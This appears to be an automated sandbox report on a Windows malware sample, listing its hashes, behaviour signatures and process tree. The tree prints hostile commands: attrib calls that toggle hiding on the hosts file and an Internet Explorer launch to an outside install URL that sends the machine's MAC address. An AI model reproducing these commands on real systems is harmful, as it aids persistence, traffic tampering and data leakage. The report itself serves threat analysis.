Analysis

  • max time kernel
    134s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    29/11/2022, 11:51

General

  • Target

    878ce1019b10960da5ab5f6064a4c31e49506a9e315e32f7767f39024cda713d.exe

  • Size

    46KB

  • MD5

    98763f13e67ab4932806e4796fa16f6f

  • SHA1

    c50c96ffcacc665caae3833fd4e09f4268968b93

  • SHA256

    878ce1019b10960da5ab5f6064a4c31e49506a9e315e32f7767f39024cda713d

  • SHA512

    885d0ca4342d71fcd872cdf84ecdc5241d337c1e4e70dbeb65a055229fd4fcbecec6774f9d9caf082113e9c5552b142b700df3481c402db1325efcbce3e3c88a

  • SSDEEP

    768:lMVvp3w/6c3nl56eNCq0FlQNLyDWQmKo0zIQvyu2M7v7XjQbnv9Et8kcysAmEw3w:lMVvp3w/j3iNq0LQNtfrwIQvyuXv7kbs

Score
8/10

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\878ce1019b10960da5ab5f6064a4c31e49506a9e315e32f7767f39024cda713d.exe
    "C:\Users\Admin\AppData\Local\Temp\878ce1019b10960da5ab5f6064a4c31e49506a9e315e32f7767f39024cda713d.exe"
    1⤵
    • Adds policy Run key to start application
    • Drops file in Drivers directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:668
    • C:\Windows\SysWOW64\attrib.exe
      attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
      2⤵
      • Views/modifies file attributes
      PID:1772
    • C:\Windows\SysWOW64\attrib.exe
      attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
      2⤵
      • Sets file to hidden
      • Views/modifies file attributes
      PID:1908
    • C:\program files\internet explorer\iexplore.exe
      "C:\program files\internet explorer\iexplore.exe" "http://www.indse.cn/install.asp?ver=090218&tgid=001&address=42-A9-8B-63-78-45&regk=1&flag=dd30f627822f784bccb9e2435dc788ed&frandom=9136"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1408 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:652

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\W6W0LKZG.txt

          Filesize

          527B

          MD5

          bec073a01806c019b859947f9e1c4b97

          SHA1

          949c91bc590de13527d83782d43c17f6ca01d1a5

          SHA256

          cbe72bb03310df46fb012e613c8fca50f1c636b6bf41bf3f58dedd2373323c55

          SHA512

          ca357eb3fce7566889f2ba75f7c2c056d5fd9f7ccbbcdc677774d4364e9c89c3ece1af74a7d5f53edd42f3f9067e429f23a9a7f2f84a763a1e20628d08d104c2

        • memory/668-54-0x0000000075981000-0x0000000075983000-memory.dmp

          Filesize

          8KB